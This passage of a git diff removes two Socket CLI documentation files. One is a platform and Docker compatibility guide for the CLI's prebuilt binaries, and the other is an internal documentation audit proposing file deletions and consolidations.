distribution - - Ubuntu 18.04+ on ARM - - Debian 10+ on ARM - - Alpine Linux 3.14+ on ARM - - Amazon Linux 2023 (Graviton) -- **Devices/Platforms:** - - AWS EC2 Graviton instances (c7g, m7g, r7g, t4g series) - - AWS Lambda (Graviton2) - - Raspberry Pi 3/4/5 (64-bit OS) - - NVIDIA Jetson - - ARM-based servers (Ampere Altra, AWS Graviton) -- **Docker:** ✅ **Growing Docker platform** - - `FROM arm64v8/ubuntu:22.04` - - `FROM arm64v8/alpine:latest` - - `--platform linux/arm64` - - AWS Graviton containers - - Raspberry Pi containers - -### Windows - -#### node24-win-x64 -- **Architecture:** x86_64 (AMD64) -- **OS:** Windows 10+ (64-bit) -- **Minimum Version:** Windows 10 1903 (May 2019) or newer -- **Server:** Windows Server 2019+ -- **Docker:** Windows containers (rare for Node.js) - -#### node24-win-arm64 -- **Architecture:** ARM64 -- **Devices:** - - Surface Pro X - - Windows 11 on ARM - - Qualcomm Snapdragon-based PCs -- **OS:** Windows 11+ on ARM -- **Emulation:** Can run x64 binaries via emulation, but native ARM64 is faster -- **Docker:** Not common - ---- - -## Docker Compatibility - -### Primary Docker Targets - -Socket CLI pkg binaries are optimized for Docker containers: - -#### 1. linux-x64 (Most Common) - -**Standard Docker images:** -```dockerfile -# Ubuntu-based -FROM ubuntu:22.04 -COPY pkg-binaries/socket-linux-x64 /usr/local/bin/socket -RUN chmod +x /usr/local/bin/socket - -# Alpine-based (smaller) -FROM alpine:3.19 -COPY pkg-binaries/socket-linux-x64 /usr/local/bin/socket -RUN chmod +x /usr/local/bin/socket - -# Official Node.js image -FROM node:24-slim -COPY pkg-binaries/socket-linux-x64 /usr/local/bin/socket -RUN chmod +x /usr/local/bin/socket -``` - -**Works on:** -- ✅ Standard x86_64 servers (Intel/AMD) -- ✅ AWS EC2 (non-Graviton) -- ✅ Google Cloud Platform -- ✅ Azure VMs -- ✅ DigitalOcean -- ✅ Heroku -- ✅ Render -- ✅ Fly.io -- ✅ Most CI/CD platforms - -#### 2. linux-arm64 (AWS Graviton, ARM Servers) - -**Graviton-optimized images:** -```dockerfile -# Ubuntu ARM64 -FROM arm64v8/ubuntu:22.04 -COPY pkg-binaries/socket-linux-arm64 /usr/local/bin/socket -RUN chmod +x /usr/local/bin/socket - -# Alpine ARM64 -FROM arm64v8/alpine:3.19 -COPY pkg-binaries/socket-linux-arm64 /usr/local/bin/socket -RUN chmod +x /usr/local/bin/socket - -# Multi-arch build -FROM --platform=linux/arm64 node:24-slim -COPY pkg-binaries/socket-linux-arm64 /usr/local/bin/socket -RUN chmod +x /usr/local/bin/socket -``` - -**Works on:** -- ✅ AWS EC2 Graviton2/3/4 (c7g, m7g, r7g, t4g) -- ✅ AWS Lambda (ARM64) -- ✅ AWS Fargate (ARM64) -- ✅ Oracle Cloud Ampere A1 -- ✅ Raspberry Pi (64-bit OS) -- ✅ ARM-based Kubernetes clusters - -### Multi-Architecture Docker Images - -Build images that work on both x86_64 and ARM64: - -```dockerfile -# Dockerfile.multiarch -FROM --platform=$BUILDPLATFORM node:24-slim AS builder -ARG TARGETARCH - -# Copy appropriate binary based on architecture -COPY pkg-binaries/socket-linux-${TARGETARCH} /usr/local/bin/socket -RUN chmod +x /usr/local/bin/socket - -# Build multi-arch image -docker buildx build --platform linux/amd64,linux/arm64 -t myorg/socket:latest . -``` - -### Docker Compose Example - -```yaml -version: '3.8' -services: - socket-scanner: - image: ubuntu:22.04 - volumes: - - ./pkg-binaries/socket-linux-x64:/usr/local/bin/socket:ro - - ./project:/workspace - working_dir: /workspace - command: socket scan create --json - platform: linux/amd64 # or linux/arm64 -``` - ---- - -## Platform Testing - -### Test Each Platform Binary - -```bash -# macOS ARM64 (Apple Silicon) -./pkg-binaries/socket-macos-arm64 --version - -# macOS x64 (Intel) -./pkg-binaries/socket-macos-x64 --version - -# Linux x64 (Docker) -docker run --rm -v ./pkg-binaries:/bin ubuntu:22.04 /bin/socket-linux-x64 --version - -# Linux ARM64 (Docker) -docker run --rm --platform linux/arm64 -v ./pkg-binaries:/bin arm64v8/ubuntu:22.04 /bin/socket-linux-arm64 --version - -# Windows x64 -.\pkg-binaries\socket-win-x64.exe --version -``` - -### Verify Docker Compatibility - -```bash -# Test in Alpine (musl libc) -docker run --rm -v ./pkg-binaries:/app alpine:3.19 /app/socket-linux-x64 --version - -# Test in Ubuntu (glibc) -docker run --rm -v ./pkg-binaries:/app ubuntu:22.04 /app/socket-linux-x64 --version - -# Test in Debian -docker run --rm -v ./pkg-binaries:/app debian:12 /app/socket-linux-x64 --version - -# Test in Amazon Linux -docker run --rm -v ./pkg-binaries:/app amazonlinux:2023 /app/socket-linux-x64 --version -``` - ---- - -## Binary Sizes - -Expected binary sizes for each platform: - -| Platform | Approximate Size | Notes | -|----------|-----------------|-------| -| linux-x64 | ~90-110 MB | Most optimized | -| linux-arm64 | ~90-110 MB | Same as x64 | -| macos-arm64 | ~90-110 MB | Code-signed | -| macos-x64 | ~90-110 MB | Code-signed | -| win-x64 | ~95-115 MB | .exe format | -| win-arm64 | ~95-115 MB | .exe format | - -**Size breakdown:** -- Node.js runtime: ~82-85 MB (custom optimized build) -- Socket CLI code (bytecode): ~5-8 MB -- Assets (translations, requirements.json): ~1-2 MB -- Overhead (pkg metadata): ~2-5 MB - ---- - -## Cloud Platform Support - -### AWS - -#### x86_64 (Intel/AMD) -- ✅ EC2: t3, t2, m5, m6i, c5, c6i, r5, r6i -- ✅ Lambda: x86_64 runtime -- ✅ Fargate: x86_64 -- ✅ ECS: x86_64 - -#### ARM64 (Graviton) -- ✅ EC2: t4g, m7g, c7g, r7g (Graviton2/3/4) -- ✅ Lambda: arm64 runtime -- ✅ Fargate: arm64 -- ✅ ECS: arm64 - -### Google Cloud Platform - -- ✅ Compute Engine: x86_64 instances -- ✅ Cloud Run: x86_64 containers -- ✅ GKE: x86_64 nodes - -### Microsoft Azure - -- ✅ Virtual Machines: x86_64 -- ✅ Container Instances: x86_64 -- ✅ AKS: x86_64 nodes - -### Other Cloud Providers - -- ✅ DigitalOcean Droplets: x86_64 -- ✅ Linode: x86_64 -- ✅ Vultr: x86_64 -- ✅ Heroku: x86_64 -- ✅ Render: x86_64 -- ✅ Fly.io: x86_64 and arm64 - ---- - -## CI/CD Platform Support - -### GitHub Actions - -```yaml -strategy: - matrix: - os: [ubuntu-latest, macos-latest, windows-latest] - arch: [x64, arm64] - -steps: - - name: Test Socket CLI - run: | - chmod +x ./pkg-binaries/socket-${{ matrix.os }}-${{ matrix.arch }} - ./pkg-binaries/socket-${{ matrix.os }}-${{ matrix.arch }} --version -``` - -### GitLab CI - -```yaml -test:linux:x64: - image: ubuntu:22.04 - script: - - ./pkg-binaries/socket-linux-x64 --version - -test:linux:arm64: - image: arm64v8/ubuntu:22.04 - tags: - - arm64 - script: - - ./pkg-binaries/socket-linux-arm64 --version -``` - -### CircleCI - -```yaml -jobs: - test-linux: - docker: - - image: ubuntu:22.04 - steps: - - run: ./pkg-binaries/socket-linux-x64 --version - - test-macos: - macos: - xcode: "15.0" - steps: - - run: ./pkg-binaries/socket-macos-arm64 --version -``` - ---- - -## Libc Compatibility - -### glibc (Most Linux Distributions) - -Socket CLI binaries are built with: -- **Minimum glibc:** 2.27 (Ubuntu 18.04, Debian 10) -- **Compatible with:** - - Ubuntu 18.04+ - - Debian 10+ - - Red Hat Enterprise Linux 8+ - - CentOS 8+ - - Fedora 36+ - - Amazon Linux 2/2023 - -### musl libc (Alpine Linux) - -Socket CLI binaries work on musl-based distributions: -- ✅ Alpine Linux 3.14+ -- ✅ Alpine-based Docker images -- ✅ Lightweight containers - -**Note:** The same binary works on both glibc and musl systems because Node.js is statically compiled with all dependencies. - ---- - -## Cross-Platform Building - -### Building for All Platforms - -To build binaries for all platforms, you need: - -1. **Custom Node.js for each platform:** - - Build on native hardware, OR - - Use GitHub Actions matrix, OR - - Use Docker emulation (slow) - -2. **GitHub Actions workflow:** - -```yaml -name: Build pkg Binaries - -on: [push] - -jobs: - build: - strategy: - matrix: - include: - - os: ubuntu-latest - target: node24-linux-x64 - - os: ubuntu-latest - target: node24-linux-arm64 # Uses QEMU - - os: macos-13 - target: node24-macos-x64 - - os: macos-14 # M1 - target: node24-macos-arm64 - - os: windows-latest - target: node24-win-x64 - - runs-on: ${{ matrix.os }} - - steps: - - uses: actions/checkout@v4 - - - name: Set up QEMU (for ARM64) - if: matrix.target == 'node24-linux-arm64' - uses: docker/setup-qemu-action@v3 - - - name: Build custom Node.js - run: pnpm run build:yao-pkg:node - - - name: Build pkg binary - run: pnpm run build:yao-pkg - - - uses: actions/upload-artifact@v4 - with: - name: socket-${{ matrix.target }} - path: pkg-binaries/* -``` - ---- - -## Recommendations - -### For Desktop Users -- **macOS:** Use `socket-macos-arm64` (Apple Silicon) or `socket-macos-x64` (Intel) -- **Windows:** Use `socket-win-x64` (most common) -- **Linux:** Use `socket-linux-x64` (most common) - -### For Docker/Containers -- **Primary:** `socket-linux-x64` (99% of Docker hosts) -- **ARM/Graviton:** `socket-linux-arm64` (AWS Graviton, ARM servers) -- **Alpine:** Both `socket-linux-x64` and `socket-linux-arm64` work - -### For CI/CD -- **GitHub Actions:** `socket-linux-x64` (default runners) -- **GitLab CI:** `socket-linux-x64` (default runners) -- **CircleCI:** `socket-linux-x64` (default Linux executor) -- **AWS CodeBuild:** `socket-linux-x64` or `socket-linux-arm64` (Graviton) - -### For Cloud Deployments -- **AWS Lambda:** `socket-linux-x64` or `socket-linux-arm64` -- **AWS Fargate:** `socket-linux-x64` or `socket-linux-arm64` -- **Google Cloud Run:** `socket-linux-x64` -- **Azure Container Instances:** `socket-linux-x64` - ---- - -## Troubleshooting - -### "No such file or directory" on Linux - -**Cause:** Missing dynamic linker or wrong architecture. - -**Fix:** -```bash -# Check binary architecture -file pkg-binaries/socket-linux-x64 -# Should show: ELF 64-bit LSB executable, x86-64 - -# Verify you're on the right platform -uname -m -# Should show: x86_64 (for linux-x64) or aarch64 (for linux-arm64) -``` - -### "Cannot execute binary file: Exec format error" - -**Cause:** Wrong architecture (e.g., trying to run arm64 on x64). - -**Fix:** Use the correct binary for your platform. - -### "Permission denied" - -**Cause:** Binary not executable. - -**Fix:** -```bash -chmod +x pkg-binaries/socket-* -``` - ---- - -## Summary - -Socket CLI pkg binaries provide **maximum compatibility** across: - -- ✅ **Desktop platforms** (macOS, Windows, Linux) -- ✅ **Docker containers** (Ubuntu, Alpine, Debian, Amazon Linux) -- ✅ **Cloud platforms** (AWS, GCP, Azure, DigitalOcean) -- ✅ **ARM architecture** (Apple Silicon, AWS Graviton, Raspberry Pi) -- ✅ **x86_64 architecture** (Intel/AMD servers and desktops) -- ✅ **CI/CD platforms** (GitHub Actions, GitLab CI, CircleCI) - -The `node24-linux-x64` binary covers **99% of Docker use cases**, while `node24-linux-arm64` provides optimal performance on ARM-based infrastructure like AWS Graviton. diff --git a/docs/documentation-audit.md b/docs/documentation-audit.md deleted file mode 100644 index 087fb328b..000000000 --- a/docs/documentation-audit.md +++ /dev/null @@ -1,643 +0,0 @@ -# Socket CLI Documentation Audit Report -Generated: 2025-11-02 - ---- - -## EXECUTIVE SUMMARY - -The Socket CLI documentation is **well-organized** using a 3-tier hierarchy system as documented in `documentation-organization.md`. However, there are opportunities for consolidation, removal of deprecated files, and optimization of verbose sections. - -**Key Metrics:** -- **Total lines:** 12,862 across all `/docs/` files -- **Total size:** 412 KB -- **Markdown files in /docs/:** 31 files across 9 subdirectories -- **Package docs:** 40+ additional markdown files in packages/ -- **Deprecated files:** 1 (`.cacache-format-DEPRECATED.md`) - ---- - -## 1. COMPLETE FILE LISTING WITH LOCATIONS AND SIZES - -### Tier 1: Monorepo Documentation (`/docs/`) - -#### Root Documentation -- `/docs/README.md` - Main documentation index -- `/docs/documentation-organization.md` - 3-tier hierarchy guide (331 lines) -- `/docs/MONOREPO.md` - Monorepo structure overview (71 lines) - -#### Architecture (`/docs/architecture/`) -| File | Lines | Size | Purpose | -|------|-------|------|---------| -| `bootstrap-stub.md` | 650 | ~18KB | Bootstrap stub architecture | -| `repository.md` | 537 | ~16KB | Repository structure | -| `stub-execution.md` | 438 | ~13KB | Stub execution flow | -| `stub-package.md` | 389 | ~12KB | Stub package details | -| `unified-binary.md` | ? | ? | Unified binary design | - -#### Build System (`/docs/build/`) -| File | Lines | Size | Purpose | -|------|-------|------|---------| -| `README.md` | 367 | ~12KB | Build system overview (INDEX) | -| `build-dist-structure.md` | ? | ~5.4KB | Output directory structure | -| `caching-strategy.md` | 241 | ~7.5KB | Build caching mechanics | -| `node-build-order-explained.md` | 287 | ~8.0KB | Patch application order | -| `node-build-quick-reference.md` | 449 | ~10KB | Custom Node.js troubleshooting | -| `node-patch-creation-guide.md` | 562 | ~13KB | Socket patch creation | -| `node-patch-metadata.md` | 342 | ~8.8KB | Patch metadata format | -| `wasm-build-guide.md` | 352 | ~6.8KB | WASM compilation | - -#### Configuration (`/docs/configuration/`) -| File | Lines | Purpose | -|------|-------|---------| -| `configuration-migration.md` | 308 | Config migration guide | -| `configuration-summary.md` | 272 | Config overview | -| `shared-configuration-architecture.md` | 299 | Shared config architecture | - -#### Development (`/docs/development/`) -| File | Lines | Purpose | -|------|-------|---------| -| `getting-started.md` | 570 | New contributor onboarding | -| `babel-plugins.md` | 519 | Babel plugin documentation | -| `linking.md` | ? | Development linking setup | -| `platform-support.md` | 506 | Cross-platform support guide | - -#### Guides (`/docs/guides/`) -| File | Lines | Purpose | -|------|-------|---------| -| `testing-yao-pkg.md` | 278 | Testing yao-pkg binary | -| `yao-pkg-ci.md` | 483 | CI setup for yao-pkg | - -#### Performance (`/docs/performance/`) -| File | Lines | Purpose | -|------|-------|---------| -| `performance-build.md` | 403 | Build performance optimization | -| `performance-ci.md` | 406 | CI performance strategies | -| `performance-testing.md` | 536 | Test performance analysis | - -#### Technical (`/docs/technical/`) -| File | Lines | Status | Purpose | -|------|-------|--------|---------| -| `manifest-management.md` | 556 | Active | Manifest API reference | -| `manifest-extensions.md` | 475 | Active | Proposed future features | -| `metadata-files.md` | 233 | Active | Metadata file formats | -| `patch-cacache.md` | 366 | Active | Patch backup/caching | -| `.cacache-format-DEPRECATED.md` | 332 | **DEPRECATED** | Old cacache format (obsolete) | - -#### Testing (`/docs/testing/`) -| File | Lines | Purpose | -|------|-------|---------| -| `local-testing.md` | ? | Local test setup | -| `smart-test-selection.md` | 339 | Smart test selection | -| `testing-custom-node.md` | ? | Testing custom Node.js | - -### Tier 2: Package Documentation - -#### cli Package (`/packages/cli/`) -| File | Lines | Location | Status | -|------|-------|----------|--------| -| `README.md` | 44 | Short package intro | OK | -| `CHANGELOG.md` | 455 | Release history | OK | -| `docs/nlp-progressive-enhancement.md` | 271 | AI feature docs | Active | -| `src/commands/manifest/README.md` | 35 | Command docs | OK | -| `test/helpers/README.md` | 395 | Test helper docs | Active | -| `test/helpers/examples.md` | 780 | Test examples | Large | -| `test/helpers/sdk-testing.md` | 996 | SDK testing guide | Large | -| `test/integration/README.md` | 189 | Integration test docs | Active | -| `test/fixtures/commands/patch/README.md` | 123 | Test fixtures | Small | -| `.claude/python-dlx-refactor-plan.md` | 103 | **Workspace-local plan** | TODO file | - -#### node-smol-builder Package -| File | Lines | Purpose | -|------|-------|---------| -| `README.md` | ~66 | Package overview | -| `COMPRESSION-GUIDE.md` | ? | Compression guide | -| `docs/README.md` | ? | Docs index | -| `docs/binary-compression-distribution.md` | ? | Distribution strategy | -| `docs/compression-quick-start.md` | ? | Quick start | -| `docs/compression-test-results.md` | ? | Test results | -| `docs/self-extracting-binary-architecture.md` | ? | SEA architecture | -| `patches/README.md` | ? | Patches directory | - -#### sbom-generator Package -| File | Purpose | -|------|---------| -| `README.md` | Package overview | -| `docs/README.md` | Docs index | -| `docs/architecture.md` | Architecture | -| `docs/ecosystems.md` | Supported ecosystems | -| `docs/fidelity-analysis.md` | Fidelity analysis | -| `docs/implementation.md` | Implementation details | -| `docs/lock-step-compliance.md` | Compliance tracking | - -#### Other Packages with Docs -- `yoga-layout/` - WASM builder docs + research/ -- `onnxruntime/` - ONNX Runtime docs -- `node-sea-builder/` - SEA builder README -- `minilm-builder/` - ML model builder README -- `codet5-models-builder/` - Model builder README -- `build-infra/` - Build infrastructure README -- `cli-with-sentry/` - Sentry variant README -- `socket/` - Wrapper package README -- `socketbin-cli-*` (8 files) - Platform binary READMEs (identical stubs) - -### Platform Binary Package Stubs (`/packages/socketbin-cli-*`) -**Count:** 8 identical README files (one per platform) -- `socketbin-cli-darwin-arm64/README.md` -- `socketbin-cli-darwin-x64/README.md` -- `socketbin-cli-linux-arm64/README.md` -- `socketbin-cli-linux-x64/README.md` -- `socketbin-cli-alpine-arm64/README.md` -- `socketbin-cli-alpine-x64/README.md` -- `socketbin-cli-win32-arm64/README.md` -- `socketbin-cli-win32-x64/README.md` - -**Issue:** These are identical boilerplate READMEs - duplicated content - ---- - -## 2. DIRECTORIES TO DELETE - -### No `/tmp/` or `/archive/` Directories Found - -However, the following items should be considered for cleanup: - -#### A. Definitely Delete -1. **`.cacache-format-DEPRECATED.md`** - - Location: `/docs/technical/.cacache-format-DEPRECATED.md` - - Lines: 332 - - Status: Clearly marked DEPRECATED - - Reason: Implementation changed; metadata-based approach replaced it - - Safe to delete: Yes, replaced by `/docs/technical/metadata-files.md` and `/docs/technical/patch-cacache.md` - -2. **`.claude/python-dlx-refactor-plan.md`** - - Location: `/packages/cli/.claude/python-dlx-refactor-plan.md` - - Lines: 103 - - Status: Workspace-local development note - - Reason: Ephemeral planning document (should be in issues, not repo) - - Safe to delete: Yes, moves work tracking to GitHub issues - -#### B. Consider Consolidating -1. **Platform binary stubs** (8 nearly-identical README files) - - Locations: `/packages/socketbin-cli-{platform}-{arch}/README.md` - - Issue: 100% duplicate boilerplate - - Solution: Create shared template or reference in root docs - ---- - -## 3. DOCUMENTATION ISSUES - -### A. Deprecated Content (ACTIVE ISSUES) - -#### 1. `.cacache-format-DEPRECATED.md` - OBSOLETE -- **Problem:** 332-line document explaining old cacache format -- **Context:** This was replaced by metadata-based architecture (see `metadata-files.md`) -- **Evidence:** File literally named DEPRECATED -- **Impact:** May confuse developers if found during searches -- **Action:** Delete (safe - fully replaced) - -### B. Redundant/Verbose Documentation - -#### 1. Performance Documentation (3 files, 1,345 lines total) -- `performance-build.md` (403 lines) -- `performance-ci.md` (406 lines) -- `performance-testing.md` (536 lines) - -**Issue:** Excessive overlap and verbosity -- All three could be consolidated into single "Performance Guide" (500-600 lines) -- Much content is template-like (repeated headings, structure) -- Could be optimized by 40-50% - -#### 2. Configuration Documentation (3 files, 879 lines total) -- `configuration-summary.md` (272 lines) -- `configuration-migration.md` (308 lines) -- `shared-configuration-architecture.md` (299 lines) - -**Issue:** Unclear distinction between files -- `summary` vs `architecture` distinction unclear -- `migration` seems orthogonal; could be integrated into one file -- Candidates for consolidation into 2 files (600 lines) - -#### 3. Node Build Documentation (4 files, 1,640 lines total) -- `node-build-quick-reference.md` (449 lines) -- `node-patch-creation-guide.md` (562 lines) -- `node-patch-metadata.md` (342 lines) -- `node-build-order-explained.md` (287 lines) - -**Issue:** Very detailed, potentially over-documented -- 4 separate files for single concern (Node build system) -- Could consolidate to 2-3 files (1,200 lines) with clearer organization: - - "Node.js Build Guide" (combines all into cohesive flow) - - Quick reference stays separate - - Metadata format as appendix - -#### 4. CLI Test Documentation (3 files, 1,364 lines) -- `test/helpers/sdk-testing.md` (996 lines) -- `test/helpers/examples.md` (780 lines) -- `test/helpers/README.md` (395 lines) - -**Issue:** Excessively verbose for internal test utilities -- 996-line SDK testing guide is reference-level documentation -- 780-line examples file with 1 example section -- Could consolidate to 1-2 files (700-800 lines) - -#### 5. Build Architecture Documentation (4 files, 2,014 lines) -- `bootstrap-stub.md` (650 lines) -- `repository.md` (537 lines) -- `stub-execution.md` (438 lines) -- `stub-package.md` (389 lines) - -**Issue:** Stub/bootstrap architecture explained 4 ways -- Massive overlap in topics covered -- Could consolidate to 2 documents: - - "Stub Architecture Overview" (1,000 lines) - - "Bootstrap System Deep Dive" (500 lines) - -### C. Organization Issues - -#### 1. Missing Cross-Tier Links -- `/docs/build/README.md` references `build-toolchain-setup.md` which doesn't exist -- Some tier 2 docs lack back-references to tier 1 -- Yoga Layout research docs have no README index - -#### 2. Unindexed Documentation -- `/packages/yoga-layout/research/` has 3 markdown files but no README -- `/packages/cli/.claude/` contains work-in-progress (shouldn't be in source) -- `/packages/sbom-generator/` multiple docs but unclear entry point - -#### 3. Inconsistent Structure -- Some packages have `docs/README.md` index, others don't -- Mixed capitalization in filenames (no consistent pattern) -- Some packages have multiple orphaned markdown files - -### D. Outdated References - -#### 1. Missing Documentation References -- `docs/build/README.md` line 209 references `build-toolchain-setup.md` - **NOT FOUND** -- Should either create this file or remove reference - -#### 2. Configuration Documentation Unclear -- 3 separate config files seem to overlap heavily -- User won't know which to read first -- No clear hierarchy - ---- - -## 4. REDUNDANCY ANALYSIS - -### High Redundancy (Direct Duplication) - -#### Platform Binary Stubs (8 files - 100% identical) -``` -/packages/socketbin-cli-darwin-arm64/README.md -/packages/socketbin-cli-darwin-x64/README.md -/packages/socketbin-cli-linux-arm64/README.md -/packages/socketbin-cli-linux-x64/README.md -/packages/socketbin-cli-alpine-arm64/README.md -/packages/socketbin-cli-alpine-x64/README.md -/packages/socketbin-cli-win32-arm64/README.md -/packages/socketbin-cli-win32-x64/README.md -``` - -**Issue:** These are generated packages with boilerplate READMEs -**Solution:** Use shared template or symlink - -### Medium Redundancy (Significant Overlap) - -| Files | Overlap | % | Consolidation Opportunity | -|-------|---------|---|--------------------------| -| Performance docs (3) | Build/test/CI perf | 40-50% | 1 comprehensive guide | -| Config docs (3) | Architecture/summary | 30-40% | 2 files max | -| Node build docs (4) | Patch creation/metadata | 35-45% | 2 files + quick ref | -| Stub architecture (4) | Bootstrap/stub flow | 45-55% | 2 comprehensive guides | -| CLI test docs (3) | Testing patterns | 35-40% | 1-2 files | - -### Documentation-to-Code Ratio -- 412 KB docs / ~2 GB codebase = 0.02% ratio (reasonable) -- 12,862 lines docs / ~200K lines code = 6.4% ratio (acceptable) - ---- - -## 5. DOCUMENTATION THAT NEEDS CONSOLIDATION - -### Priority 1: CRITICAL (Delete Immediately) - -1. **`.cacache-format-DEPRECATED.md`** (332 lines) - - Action: DELETE - - Reason: Clearly deprecated, replaced by metadata approach - - Saves: 332 lines - -2. **`.claude/python-dlx-refactor-plan.md`** (103 lines) - - Action: DELETE or MOVE to GitHub Issue - - Reason: Ephemeral development plan, shouldn't be in repo - - Saves: 103 lines - -### Priority 2: CONSOLIDATE (Same level of importance) - -#### Set A: Build Architecture (4 files → 2 files, saves 300-400 lines) -**Current:** -- `docs/architecture/bootstrap-stub.md` (650 lines) -- `docs/architecture/repository.md` (537 lines) -- `docs/architecture/stub-execution.md` (438 lines) -- `docs/architecture/stub-package.md` (389 lines) -- **Total: 2,014 lines** - -**Proposed:** -- `docs/architecture/stub-system-overview.md` (~900-1000 lines) - - What is stub/bootstrap system - - Package structure - - Execution flow - - Repository integration -- `docs/architecture/stub-deep-dive.md` (~400-500 lines) - - Low-level details - - Implementation specifics - - Internals for maintainers -- **New total: 1,300-1,500 lines** (Savings: 500-700 lines) - -**Rationale:** These 4 documents repeat the same core concepts from different angles. A narrative flow document + detailed reference works better. - -#### Set B: Node.js Build Documentation (4 files → 2 files, saves 400-500 lines) -**Current:** -- `docs/build/node-build-quick-reference.md` (449 lines) -- `docs/build/node-patch-creation-guide.md` (562 lines) -- `docs/build/node-patch-metadata.md` (342 lines) -- `docs/build/node-build-order-explained.md` (287 lines) -- **Total: 1,640 lines** - -**Proposed:** -- `docs/build/node-build-system.md` (~1,000-1,200 lines) - - Complete building Node.js from source - - Patch creation workflow - - Patch metadata structure - - Patch application order -- `docs/build/node-build-quick-reference.md` (~300 lines) - - Keep as-is for quick lookup -- **New total: 1,300-1,500 lines** (Savings: 140-340 lines) - -**Rationale:** "Order explained", "creation guide", and "metadata" are all prerequisites for understanding patches. A single comprehensive guide followed by quick reference is clearer. - -#### Set C: Configuration Documentation (3 files → 2 files, saves 150-200 lines) -**Current:** -- `docs/configuration/configuration-summary.md` (272 lines) -- `docs/configuration/shared-configuration-architecture.md` (299 lines) -- `docs/configuration/configuration-migration.md` (308 lines) -- **Total: 879 lines** - -**Proposed:** -- `docs/configuration/configuration-guide.md` (~600-700 lines) - - Architecture first - - Summary of all options - - Migration guide as section -- **New total: 600-700 lines** (Savings: 179-279 lines) - -**Rationale:** These files blur together. A single guide with sections is clearer than 3 separate files. - -#### Set D: Performance Documentation (3 files → 1 file, saves 400-500 lines) -**Current:** -- `docs/performance/performance-build.md` (403 lines) -- `docs/performance/performance-ci.md` (406 lines) -- `docs/performance/performance-testing.md` (536 lines) -- **Total: 1,345 lines** - -**Proposed:** -- `docs/performance/performance-optimization-guide.md` (~700-850 lines) - - Build performance - - Test performance - - CI performance - - Shared principles throughout -- **New total: 700-850 lines** (Savings: 495-645 lines) - -**Rationale:** All three files cover the same optimization principles applied to different subsystems. One comprehensive guide is more efficient. - -#### Set E: CLI Test Documentation (3 files → 2 files, saves 300-400 lines) -**Current:** -- `packages/cli/test/helpers/README.md` (395 lines) -- `packages/cli/test/helpers/sdk-testing.md` (996 lines) -- `packages/cli/test/helpers/examples.md` (780 lines) -- **Total: 2,171 lines** - -**Proposed:** -- `packages/cli/test/helpers/README.md` (~400 lines) - - Overview + quick start (keep as index) -- `packages/cli/test/helpers/testing-guide.md` (~1,100-1,200 lines) - - SDK testing patterns - - Examples integrated into patterns - - Best practices -- **New total: 1,500-1,600 lines** (Savings: 571-671 lines) - -**Rationale:** Examples should illustrate patterns, not be separate. Consolidate into cohesive guide. - -### Priority 3: ORGANIZE (Better Structure, No Deletion) - -#### Platform Binary Stubs (8 files → 1 shared template) -**Action:** -- Create: `docs/build/platform-binary-packages.md` -- Remove: Individual platform README duplication -- Solution: - - Symlink or reference template for all 8 platform packages - - Or generate from single source - -**Savings:** Remove 7 redundant files (but not critical - they're tiny) - -#### Unindexed Package Docs -**Action:** -- Add README.md to `/packages/yoga-layout/research/` (currently 3 orphaned docs) -- Verify all package `docs/` folders have index files -- Create missing indices for `/packages/sbom-generator/docs/` - ---- - -## 6. CONSOLIDATION RECOMMENDATIONS SUMMARY - -### Consolidation Plan (by priority) - -#### Phase 1: Immediate Cleanup (Low Risk) -**Action:** Delete these files safely -1. `/docs/technical/.cacache-format-DEPRECATED.md` (332 lines) -2. `/packages/cli/.claude/python-dlx-refactor-plan.md` (103 lines) - -**Impact:** Remove obsolete content, clean up workspace -**Effort:** 5 minutes -**Risk:** None - content is replaced or is ephemeral - -#### Phase 2: High-Impact Consolidations (Medium Risk) -**Consolidate (in this order, as each builds on previous):** - -1. **Performance Documentation** (1,345 lines → 700-850 lines) - - Effort: 2-3 hours - - Risk: Low - similar content across files - - Saves: 495-645 lines - -2. **Configuration Documentation** (879 lines → 600-700 lines) - - Effort: 1-2 hours - - Risk: Low - clear distinction between files unclear - - Saves: 179-279 lines - -3. **Node.js Build Documentation** (1,640 lines → 1,300-1,500 lines) - - Effort: 3-4 hours - - Risk: Medium - complex topic, must preserve accuracy - - Saves: 140-340 lines - -#### Phase 3: Architectural Consolidations (Higher Risk) -**Consolidate only if Phase 2 successful:** - -1. **Build Architecture Documentation** (2,014 lines → 1,300-1,500 lines) - - Effort: 4-5 hours - - Risk: Medium-High - core system documentation - - Saves: 500-700 lines - - Prerequisite: Team discussion on narrative structure - -2. **CLI Test Documentation** (2,171 lines → 1,500-1,600 lines) - - Effort: 3-4 hours - - Risk: Low - test documentation, less critical - - Saves: 571-671 lines - -#### Phase 4: Low-Impact Cleanup -**Better organization (no deletion):** -1. Platform binary package README unification -2. Add missing index files to package docs -3. Fix broken cross-references - -### Overall Consolidation Potential -- **Total lines saveable:** 2,000-3,100 lines (15-24% reduction) -- **Safer path:** 674-782 lines (5-6% reduction, minimal risk) -- **Realistic achievable:** 1,200-1,600 lines (9-12% reduction) - -### Quality Improvements (Non-Quantified) -- Clearer navigation (fewer files to choose from) -- Better consistency (single source of truth) -- Reduced maintenance burden -- Improved discoverability - ---- - -## DETAILED FINDINGS BY CATEGORY - -### Architecture Documentation -**Assessment:** Over-documented -- 2,014 lines across 4 files -- Significant overlap in explaining stub/bootstrap concepts -- Each file explains flow from different angle (redundant) -- **Recommendation:** Consolidate to 2 files (narrative + reference) - -### Build System Documentation -**Assessment:** Well-organized but verbose -- Good separation of concerns (quick-ref vs deep-dive) -- Node build docs (1,640 lines) could be condensed -- Good cross-referencing between files -- **Recommendation:** Consolidate Node.js docs, keep others - -### Configuration Documentation -**Assessment:** Confusing structure -- 3 files, unclear which to read first -- `summary` vs `architecture` distinction unclear -- Migration guide mixed in -- **Recommendation:** Single coherent guide, 2 files max - -### Development Documentation -**Assessment:** Good -- Covers key topics (getting started, babel, platform support) -- Appropriate length -- **Recommendation:** Keep as-is - -### Performance Documentation -**Assessment:** Redundant -- 1,345 lines repeating same principles 3 times -- Could be 40-50% shorter -- **Recommendation:** Consolidate to single comprehensive guide - -### Technical Documentation -**Assessment:** Mostly good, has deprecated file -- `.cacache-format-DEPRECATED.md` should be deleted -- Metadata and patch-cacache docs are current -- Manifest docs are well-maintained -- **Recommendation:** Delete deprecated file, keep others - -### Testing Documentation -**Assessment:** Under-indexed but excessive detail -- No clear entry point -- 2,171 lines for CLI tests alone -- Examples and patterns mixed together -- **Recommendation:** Better organization + consolidation - ---- - -## FINAL RECOMMENDATIONS - -### Immediate Actions (Do This Week) -1. **Delete** `/docs/technical/.cacache-format-DEPRECATED.md` -2. **Move** 